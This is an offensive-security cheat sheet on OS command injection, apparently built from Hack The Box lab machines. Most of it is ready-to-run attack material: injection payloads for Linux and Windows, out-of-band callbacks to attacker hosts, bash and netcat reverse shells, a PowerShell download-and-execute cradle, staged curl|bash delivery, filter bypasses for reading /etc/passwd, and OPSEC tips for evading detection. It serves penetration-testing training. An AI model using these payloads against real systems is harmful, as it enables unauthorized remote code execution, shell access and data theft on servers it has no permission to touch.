Command Injection
#Overview
Command injection vulnerabilities occur when user-supplied input is passed directly to a system shell command without proper sanitization. This allows an attacker to execute arbitrary OS commands on the server. Command injection is distinct from code injection -- it targets the underlying operating system shell rather than the application language. It is commonly found in applications that execute system utilities for ping, nslookup, file operations, backup scripts, or image processing.
#Prerequisites
- Identified input that likely triggers a system command (ping, traceroute, DNS lookup, file operations)
- Knowledge of the target OS (Linux vs Windows -- different command chaining syntax)
- Netcat for reverse shell listener
- Python HTTP server for file staging
#Detection & Enumeration
#Basic Injection Testing
# Test for command execution via timing
curl -s -w '\nTime: %{time_total}s\n' 'http://target.htb/ping?ip=127.0.0.1'
curl -s -w '\nTime: %{time_total}s\n' 'http://target.htb/ping?ip=127.0.0.1;sleep+5'
# If second request takes ~5 seconds longer: command injection confirmed
# Common test payloads (Linux)
; id
| id
|| id
& id
&& id
`id`
$(id)
# Common test payloads (Windows)
; dir
| dir
|| dir
& dir
&& dir
BASH
#Command Chaining Operators by OS
| Operator | Linux | Windows | Description |
|---|---|---|---|
; | Yes | No | Sequential execution |
| | Yes | Yes | Pipe output |
|| | Yes | Yes | OR (if previous fails) |
& | Background | Yes | Background / AND |
&& | Yes | Yes | AND (if previous succeeds) |
` | Yes | No | Command substitution |
$() | Yes | No | Command substitution |
%0a | Yes | No | Newline (URL-encoded) |
%0d%0a | Yes | No | CRLF |
#Blind Command Injection Detection
# Time-based detection
curl -s 'http://target.htb/ping?ip=127.0.0.1;sleep+5'
# Out-of-band detection -- start listener first
nc -lnvp 80
curl -s 'http://target.htb/ping?ip=127.0.0.1;curl+http://10.10.14.40:80/test'
# DNS-based OOB
curl -s 'http://target.htb/ping?ip=127.0.0.1;nslookup+$(whoami).attacker.com'
# Write to webroot and verify
curl -s 'http://target.htb/ping?ip=127.0.0.1;echo+test+>+/var/www/html/ping.txt'
curl -s 'http://target.htb/ping.txt'
BASH
#Exploitation / Execution
#Direct Command Execution
# Linux: Basic command execution
curl -s -X POST 'http://target.htb/exec' -d 'cmd=127.0.0.1;id'
curl -s 'http://target.htb/ping?ip=127.0.0.1|id'
# Windows: Basic command execution
curl -s 'http://target.htb/ping?ip=127.0.0.1|dir+C:\'
# Reverse shell payloads (Linux)
curl -s 'http://target.htb/ping?ip=127.0.0.1;bash+-c+"bash+-i+>%26+/dev/tcp/10.10.14.40/4444+0>%261"'
curl -s 'http://target.htb/ping?ip=127.0.0.1;nc+-e+/bin/bash+10.10.14.40+4444'
# Reverse shell payloads (Windows)
curl -s 'http://target.htb/ping?ip=127.0.0.1|powershell+-c+"IEX(New-Object+Net.WebClient).DownloadString(\'http://10.10.14.40/shell.ps1\')"'
BASH
#Filter Bypass Techniques
# Space bypass using ${IFS} (Linux)
curl -s 'http://target.htb/cmd?host=127.0.0.1;cat${IFS}/etc/passwd'
# Space bypass using %09 (tab, URL-encoded)
curl -s 'http://target.htb/cmd?host=127.0.0.1;cat%09/etc/passwd'
# Newline bypass
curl -s 'http://target.htb/cmd?host=127.0.0.1%0aid'
# Using backticks for command execution
curl -s 'http://target.htb/cmd?host=`id`'
# Using $() for command execution
curl -s 'http://target.htb/cmd?host=$(id)'
# Base64 encoding bypass (if filtered)
curl -s 'http://target.htb/cmd?host=127.0.0.1;echo+Y2F0IC9ldGMvcGFzc3dk|base64+-d|bash'
# Decoded: cat /etc/passwd
# Hex encoding
curl -s 'http://target.htb/cmd?host=127.0.0.1;echo+$'\x69\x64''
BASH
#Practical Command Injection (CozyHosting HTB Technique)
# The application runs: ssh -i id_rsa USERNAME@HOSTNAME
# HOSTNAME validates against regex, but USERNAME does not
# Test callback with ${IFS} space bypass
# Submit in username field: test;curl${IFS}http://10.10.14.49:7000;
curl -s -X POST 'http://cozyhosting.htb/exec' \
-d 'username=test;curl${IFS}http://10.10.14.49:7000;&hostname=127.0.0.1'
# Stage a reverse shell script and execute it
echo -e '#!/bin/bash\nsh -i >& /dev/tcp/10.10.14.49/4444 0>&1' > rev.sh
python3 -m http.server 7000 &
nc -lnvp 4444 &
curl -s -X POST 'http://cozyhosting.htb/exec' \
-d 'username=test;curl${IFS}http://10.10.14.49:7000/rev.sh|bash;&hostname=127.0.0.1'
BASH
#Maltrail Command Injection (Sau HTB Technique)
# Maltrail v0.53 is vulnerable to unauthenticated command injection
# via the username parameter in the login endpoint
# Download public PoC
curl -s https://www.exploit-db.com/download/51676 > exploit.py
# Execute exploit through SSRF proxy basket
python3 exploit.py 10.10.14.6 4444 http://10.10.11.224:55555/<basket_id>
BASH
#Staged Reverse Shell via Web Delivery
# 1. Create shell script
echo '#!/bin/bash' > shell.sh
echo 'bash -i >& /dev/tcp/10.10.14.40/9001 0>&1' >> shell.sh
# 2. Host it
python3 -m http.server 80 &
# 3. Start Netcat listener
nc -lnvp 9001 &
# 4. Trigger download and execution
curl -s 'http://target.htb/cmd?ip=127.0.0.1;curl+10.10.14.40/shell.sh|bash'
# Same technique via wget
curl -s 'http://target.htb/cmd?ip=127.0.0.1;wget+-O-/tmp/s+10.10.14.40/shell.sh;bash+/tmp/s'
BASH
#Common Pitfalls
- Whitespace filtered -- use
${IFS},%09(tab),%0a(newline), or<(input redirect) - Slashes filtered -- use environment variables:
${HOME:0:1}=/ - Quotes filtered -- use hex or base64 encoding to avoid special characters
- Pipes filtered -- use output redirection or backticks instead
- Semicolons filtered -- try
||,&&,|,%0a - Reverse shell not connecting -- check firewall, try different ports (80, 443, 53)
nc -enot available -- usebash -i >& /dev/tcp/host/portorpython/powershellreverse shells
#OPSEC Considerations
- Reverse shell connections on nonstandard ports trigger NIDS alerts
- Multiple consecutive command injection attempts generate high-volume error logs
curl/wgetto external IPs leaves entries in bash history and web logssleepcommands for blind detection cause observable latency- Out-of-band DNS lookups generate unusual DNS query patterns
#Post-Exploitation Value
- Direct OS command execution as the web server user
- File system access for configuration enumeration
- Network enumeration of internal services
- Platform for kernel exploit or privilege escalation
#Cross-References
#Tool References
| Tool | Link |
|---|---|
| commix | https://github.com/commixproject/commix |
| RevShells | https://www.revshells.com |
| PayloadsAllTheThings CMDi | https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection |
#Source Machines
- CozyHosting (Easy, Linux) -- Command injection in SSH username field, ${IFS} space bypass, curl+pipe+bash
- Sau (Easy, Linux) -- Maltrail v0.53 unauthenticated command injection via username parameter